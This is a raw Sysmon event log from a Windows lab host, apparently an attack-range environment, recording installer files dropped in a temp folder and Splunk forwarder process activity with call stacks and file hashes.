13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe2021-01-18 13:59:46.021 11241100x800000000000000013968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\plugin-hang-ui.exe2021-01-18 13:59:46.021 11241100x800000000000000013967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\plugin-container.exe2021-01-18 13:59:46.021 11241100x800000000000000013966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\pingsender.exe2021-01-18 13:59:46.021 11241100x800000000000000013965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\minidump-analyzer.exe2021-01-18 13:59:46.021 11241100x800000000000000013964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\maintenanceservice_installer.exe2021-01-18 13:59:46.021 11241100x800000000000000013963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\maintenanceservice.exe2021-01-18 13:59:46.021 11241100x800000000000000013962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:45.990{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\uninstall\helper.exe2021-01-18 13:59:45.990 10341000x800000000000000014029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.177{59A5CD1D-9453-6005-2705-00000000A301}65366540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.849{59A5CD1D-9454-6005-2905-00000000A301}46842856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.177{59A5CD1D-9454-6005-2805-00000000A301}66086632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 